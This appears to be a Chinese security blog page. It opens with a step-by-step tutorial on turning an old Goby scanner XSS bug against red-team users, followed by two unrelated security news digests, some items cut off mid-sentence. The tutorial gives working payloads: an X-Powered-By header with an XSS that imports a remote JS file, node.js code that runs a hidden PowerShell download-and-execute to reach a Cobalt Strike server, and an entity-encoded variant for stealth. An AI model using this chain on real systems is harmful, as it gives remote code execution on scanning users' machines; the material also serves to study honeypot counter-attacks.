前言 Goby作为新一代网络安全技术，通过为目标建立完整的资产数据库，实现快速的安全应急，日常为广大师傅提供了便捷的渗透体验。最近有观察到有关于某些蜜罐出现了Goby反制的指纹，顿时就起了兴趣进行研究Goby的反制，期间也遇到了很多网上没有答案的坑点，这里把遇到的问题和关键点给师傅们列举出来，希望师傅们能了解到反制的整个流程，在攻防中也不要被反制。 原理 据Goby官方解释，这实际上是一个非常久远的历史漏洞，最早的纰漏的时间是在2021年10月，当月漏洞就已修复并发布新版本。至于漏洞为何存在，得追溯到Goby的组件识别能力，Goby是使用Electron构建的客户端软件，在Goby的资产界面中，扫描结果里会展示所有符合指纹识别规则的组件名称，比如PHP、IIS等，而Goby为了更为精准的组件识别，Goby会从返回的数据报文中提取版本信息（例如X-Powered-By中），并在资产界面进行渲染展示，在旧版本的Goby中并未对版本信息做无害化处理，从而导致漏洞产生。 X-Powered-By X-Powered-By 是 HTTP 头中的一个字段,主要用于表示网站所使用的服务器、编程语言或框架等信息。例如对于Apache中间件的网站默认会包含X-Powered-By，其中包含一些banner（如PHP/5.3.29），Goby则是收集这些banner来识别组件信息的 我们也可以自定义一个X-Powered-By 头来干扰Goby进行指纹识别，例如在代码中加入 <?php header("X-Powered-By: yuzi"); ?> 当我们我们再次发包查看会发现X-Powered-By: yuzi 而对于Nginx中间件的网站默认不会包含X-Powered-By，需要自己构造X-Powered-By才显示，对比Apache中间件网站会安全一些 对于其他中间件来说 Tomcat：默认添加,例如 X-Powered-By: Servlet/3.0 IIS：默认添加,例如 X-Powered-By: http://ASP.NET Jetty：默认添加,例如 X-Powered-By: Jetty 反制复现 环境准备： 注：受到反制影响的Goby版本应 < 2.0.0 Goby历史版本下载：https://gobysec.net/updates?v=15#Beta(1.9.325)%E2%80%A2Feb16,2022 Nginx环境复现 在网站根目录下对网站的首页（index.php）添加带payload的X-Powered-By段 <?php header("X-Powered-By: PHP/5.3.29 <img\tsrc=1\tonerror=alert(/helloworld/)>"); ?> //语句中的/t不能用空格进行替代可以用tab键代替，且所有的空格处应该为tab键 //标签内语句中若存在双引号则要反斜杠（\）对其进行转义，如<img\tsrc=\"x\"\tonerror=\"alert(/helloworld/);\"> //若数字在弹窗内容中则无需在两边加斜杠（/），如<img\tsrc=1\tonerror=\"alert(1);\"> 此时，红队在利用Goby对该蓝队主机进行扫描，扫描完后红队会自然而然地点击IP处进行查看当前的扫描结果 当红队进入IP的资产页面后，页面会优先显示蓝队主机网站的首页的指纹信息，此时我们在首页构造的X-Powered-By被Goby识别且没有做识别过滤，因此会在Goby资产页面显示并且payload会被执行 在Goby识别指纹的时候，把恶意语句识别进去了，在PHP指纹界面上可以很清楚的看到蓝队在首页的payload，但是Goby在该页面上并不会触发payload，只有从主页中点击进入IP详情界面，才会触发payload 由于Goby使用Electron构建客户端软件，Electron用的是node.js，并且node.js能执行系统命令，故可以把危害放大化直接反制上线蓝队CS，将主页的payload更改为远程加载JS文件来执行命令 <?php header("X-Powered-By: PHP/5.3.29 <img\tsrc=1\tonerror=import(unescape('http%3A//192.168.108.164/1.js'))>"); ?> //URL中的:需要用%3A表示，unescape()会复原URL 构造主页payload中需要远程加载的恶意JS文件1.js (function(){ require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'http://192.168.108.164:100/a\'))"'); })(); //exec()内可以执行任意的系统命令例如exec('calc.exe');弹出计算机，这里通过CS的powershell命令执行进行上线 //若需要执行上线CS的命令的时，要用反斜杠（\）要把单引号转义一下，其他命令不用 在开始之前，由于刚刚Goby演示的扫描结果存在缓存，故正式开始之前应该先退出Goby，重新打开并新建扫描刚刚第一次的步骤来触发更改后的payload 为了反制时候达到隐匿效果，通常蜜罐会将payload进行HTML实体编码如 <?php header("X-Powered-By: PHP/5.3.29 <img src=1 onerror=&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x28;&#x75;&#x6e;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x28;&#x27;&#x68;&#x74;&#x74;&#x70;&#x25;&#x33;&#x41;&#x2f;&#x2f;&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x31;&#x30;&#x38;&#x2e;&#x31;&#x36;&#x34;&# ?> //标签不能编码 到这里，Nginx中间件的网站算是复现成功，但是还没结束，因为Apache等中间件会默认会包含X-Powered-By，这对Goby来说是不利于识别我们在X-Powered-By构造payload的，因此许多师傅只能在Nginx环境下复现成功，其实Apache环境也是可以复现成功的 Apache环境复现 为了让我们构造的X-Powered-By不和Apache自身默认的X-Powered-By造成冲突，我们需要在Apache中禁用默认的X-Powered-By。我们打开Apache的配置文件httpd.conf，文件中任意空白处添加 ServerTokens Prod //将ServerTokens设置为Prod将隐藏Apache版本信息和X-Powered-By头 添加完后，记得重启Apache服务，按照和Nginx一样的步骤也可以复现成功 最后 此Goby反制虽然是一个已经修复很久的漏洞了，但是基数上还是会有许多人在使用着存在漏洞的Goby版本，对应地在公网上也存在很多反制Goby的蜜罐，在攻防演练中也有可能用得上，故做此分析供各位师傅参考。

1、黑客利用MSIX应用程序包文件传播GHOSTPULSE恶意软件 https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks 最近，一种新的网络攻击活动被发现，利用伪造的MSIX应用程序包文件，模仿一些流行的软件，如谷歌浏览器、微软Edge、Brave、Grammarly和Cisco Webex，来分发一种名为GHOSTPULSE的新型恶意软件加载器。目标用户可能通过一些已知的技术，如被入侵的网站、搜索引擎优化(SEO)污染或恶意广告，被诱导下载这些MSIX包文件。运行MSIX文件会打开一个Windows提示框，要求用户点 2、动态搜索广告传播恶意软件，危害用户安全 https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza 一种利用动态搜索广告(DSA)传播恶意软件的网络攻击活动近期被研究人员发现。网站所有者不知道的是，他们的一个广告是自动创建的，目的是宣传Python开发人员的流行程序，并且人们在Google上搜索该程序时可以看到该广告。点击广告的受害者会被带到一个被黑的网页，其中包含下载该应用程序的链接，结果却安装了十多个不同的恶意软件。动态搜索广告(DSA)是一种 3、乌克兰“IT军队”攻击俄罗斯运营商 https://securityaffairs.com/153192/hacktivism/it-army-of-ukraine-hit-russia-isp.html 乌克兰自愿“IT军队”是一支由政府领导的网络志愿者组织，旨在对抗俄罗斯的网络攻击和宣传。该组织通过Telegram频道发布任务，要求志愿者对俄罗斯的网站和基础设施进行分布式拒绝服务(DDoS)攻击，以干扰其正常运行。该组织还要求志愿者举报YouTube上散布关于乌克兰战争谎言的频道。乌克兰“IT军队”的目标包括俄罗斯的能源巨头Gazprom，俄罗斯的银行和政府网站，以及俄罗斯的新闻网站。该组织还将白俄罗斯作为俄罗斯的盟友之一 4、Hive勒索软件团伙疑似改名为Hunters International https://www.bleepingcomputer.com/news/security/new-hunters-international-ransomware-possible-rebrand-of-hive/ 据报道，一种名为Hunters International的新勒索软件服务品牌出现了，它使用了Hive勒索软件行动的代码，这让人有理由怀疑原来的团伙在换了个旗号后重新活跃起来。安全研究人员分析了Hunters International的样本，发现它与Hive勒索软件攻击中使用的代码有着惊人的相似之处。具体来说，研究人员首先发现了这种新的加密器，他得出结论认为Hunters 5、美国学区遭黑客攻击，学生数据被泄露并发送给家长 https://www.databreaches.net/hackers-escalate-leak-200k-ccsd-students-data-claim-to-still-have-access-to-ccsd-email-system/ 2023年10月5日，美国内华达州的克拉克县学区(CCSD)发现其电子邮件环境受到了未经授权的访问，随后启动了调查，并与执法部门合作。CCSD是美国第五大学区，拥有超过30万名学生和1.5万名教师。调查结果显示，黑客获取了部分学生、家长和员工的有限个人信息，包括学生照片、地址、学生ID号和电子邮件地址等。攻击发生后，CCSD禁止了外部账户访问其谷歌 6、加拿大禁止政府电话使用微信和卡巴斯基 https://www.securityweek.com/canada-bans-wechat-and-kaspersky-on-government-phones/ 加拿大周一以隐私和安全风险为由，禁止政府智能手机和其他移动设备使用流行的中国通讯应用微信和俄罗斯平台卡巴斯基。 7、波音公司正在调查勒索软件攻击事件 https://www.securityweek.com/boeing-investigating-ransomware-attack-claims/ 波音公司正在调查 LockBit 勒索软件团伙最近提出的勒索，称大量数据从这家航空航天巨头的网络中被泄露。 8、Apple推出联系人密钥验证提高 iMessage 安全性 https://www.securityweek.com/apple-improves-imessage-security-with-contact-key-verification/ 苹果周五推出了联系人密钥验证，这是一项旨在提高 iMessage 服务安全性的新功能。 9、一种复杂的恶意软件STRIPEDFLY感染了100 多万台设备 https://securityaffairs.com/153208/malware/stripedfly-complex-malware.html 被追踪为 StripedFly 的复杂恶意软件五年来一直未被发现，并感染了大约一百万台设备。 10、Kubernetes 的NGINX 入口控制器中发现新的高危漏洞 https://thehackernews.com/2023/10/urgent-new-security-flaws-discovered-in.html Kubernetes 的NGINX Ingress 控制器中披露了三个未修补的高严重性安全漏洞，威胁行为者可能会利用这些漏洞从集群中窃取秘密凭证。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员揭露类似美国国安局代码的StripedFly恶意软件 https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/ 研究人员在周四发布的报告中，揭露了一种高度复杂的、持续多年的间谍框架，它与美国国家安全局(NSA)相关的恶意软件有相似之处。报告描述了一个名为StripedFly的框架，它能够截屏、获取系统版本信息、窃取网站登录用户名、密码和其他自动填充数据、访问Wi-Fi网络信息(包括密码)、录制麦克风音频，并识别和窃取敏感文件。StripedFly依赖于一个定制的EternalBlue漏洞利用程序——一种2016年泄露到网上的NSA恶意软件——来感染受 2、新型攻击利用苹果芯片漏洞窃取Safari浏览器敏感信息 https://ileakage.com/files/ileakage.pdf 研究人员发现了一种名为iLeakage的新型侧信道攻击，该攻击利用了运行在苹果iOS，iPadOS和macOS设备上的A系列和M系列ARM处理器的一个弱点，从而能够从Safari浏览器中提取敏感信息。研究人员称，“攻击者可以让Safari渲染任意网页，然后使用推测执行来恢复其中存在的敏感信息”。在一个实际的攻击场景中，这个弱点可以被一个恶意网页利用，来恢复Gmail收件箱内容，甚至恢复由凭证管理器自动填充的密码。iLeakage不仅是针对苹果硅芯片的第一例Spectre风格的推测执行攻击，而且由于苹果的App S 3、F5警告BIG-IP存在严重远程代码执行漏洞 https://my.f5.com/manage/s/article/K000137353 F5公司发布了一份安全公告，警告客户其BIG-IP产品存在一个严重的安全漏洞，可能导致未经身份验证的远程代码执行。该漏洞源于配置实用程序组件，已被分配CVE标识符CVE-2023-46747，其CVSS评分为10分中的9.8分。F5公司表示：“该漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址访问BIG-IP系统，从而执行任意系统命令。这不会影响数据平面；这只是一个控制平面问题。”F5公司还提供了一些缓解措施，包括使用一个shell脚本和阻止配置实用程序通过自身IP地址或管理接口的访问。 4、Lazarus利用合法软件发起新一轮攻击 https://securelist.com/unveiling-lazarus-new-campaign/110888/ Lazarus是一个臭名昭著的网络攻击组织，其下属的一个分支Andariel近期发起了一系列新的攻击活动。这些攻击利用了另一个知名软件的漏洞，通过合法的安全软件传播恶意代码。这些漏洞并不是新发现的，但是由于软件开发商没有及时修复，或者用户没有及时更新，导致了Lazarus可以持续利用这些漏洞进行攻击。该软件开发商也曾多次成为Lazarus的攻击目标，可能是为了窃取其源代码或者破坏其软件供应链。在这些攻击中，Lazarus使用了一个名为SIGNBT的恶意软件，该软件具有复 5、俄罗斯黑客组织APT28破坏法国关键网络 https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf 据法国国家信息系统安全局ANSSI(国家信息系统安全局)最新发布的一份报告显示，俄罗斯的APT28黑客组织(又名“Strontium”或“Fancy Bear”)自2021年下半年以来，对法国的政府、企业、学校、研究机构和智库进行了大规模的网络攻击。该黑客组织被认为是俄罗斯军事情报服务GRU的一部分，曾经参与过对美国、德国、乌克兰等国家的网络间谍和破坏活动。报告称，APT28利用了多种技术、策略和程序(TTP)，包括暴力破解、钓鱼邮件、利用已知和零日漏洞等，来获取法国组织 6、Mirth Connect存在严重漏洞，危及医疗数据 https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ Mirth Connect是NextGen HealthCare开发的一款开源数据集成平台，广泛应用于医疗行业。该平台在4.4.1版本之前存在一个未经身份验证的远程代码执行漏洞，编号为CVE-2023-43208。该漏洞是对之前报告的CVE-2023-37679漏洞的绕过。攻击者可以利用该漏洞在目标系统上执行任意命令，从而获取初始访问权限或窃取敏感的医疗数据。该漏洞影响了2015/2016年以来的所 7、Citrix Bleed漏洞可导致NetScaler账户被劫持 https://www.bleepingcomputer.com/news/security/citrix-bleed-exploit-lets-hackers-hijack-netscaler-accounts/ Citrix Bleed漏洞，编号为CVE-2023-4966，是一种未经认证的缓冲区相关漏洞，存在于Citrix设备中，可以被利用来获得对设备的无限制访问，并可能劫持用户账户。该漏洞影响了Citrix NetScaler ADC和NetScaler Gateway，这些设备提供了负载均衡、防火墙和VPN服务。该漏洞的利用方法是通过访问/oauth/idp/.well-known 8、智利电信巨头GTD遭Rorschach勒索软件攻击 https://www.bleepingcomputer.com/news/security/chilean-telecom-giant-gtd-hit-by-the-rorschach-ransomware-gang/ 智利电信公司GTD遭受了一场网络攻击，导致其多项服务受到影响，包括数据中心、互联网接入和网络电话。GTD在一份安全事件通知中表示，他们正在经历一场影响部分服务的网络安全事件。当天，智利内政部和公共安全部的计算机安全事件响应小组确认，GTD遭受了勒索软件攻击。该小组在其网站上发表了一份声明，称GTD向他们报告了一种影响其IaaS平台部分的勒索软件。虽然该小组没有透露攻击GTD 9、CCleaner用户数据遭MOVEit大规模黑客攻击 https://techcrunch.com/2023/10/27/ccleaner-says-hackers-stole-users-personal-data-during-moveit-mass-hack/ CCleaner是一款广受欢迎的优化软件，但其开发商Gen Digital近日向用户确认，该软件在5月份发生的MOVEit大规模黑客攻击中，泄露了大量付费用户的个人信息。据悉，黑客利用了MOVEit文件传输工具的一个漏洞，该工具被CCleaner和数千个组织用于在互联网上传输大量敏感数据。黑客窃取了用户的姓名、联系方式和购买的产品信息。Gen Digital的发言人Jess Mon 10、LockBit勒索软件团伙声称入侵了波音公司 https://securityaffairs.com/153149/cyber-crime/lockbit-ransomware-gang-boeing.html Lockbit勒索软件组织今天将波音公司添加到其Tor泄露网站的受害者名单中。该团伙声称从该公司窃取了大量敏感数据，并威胁如果波音不在截止日期(2023年11月2日13:25:39UTC)内联系他们，他们将公布这些数据。截至至10月29日时，该组织尚未发布任何样本。“波音公司是一家市值600亿美元的公司，与其子公司一起在全球范围内设计、开发、制造、销售、服务和支持商用喷气式客机、军用飞机、卫星、导弹防御、载人航天以及发射系统和服 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。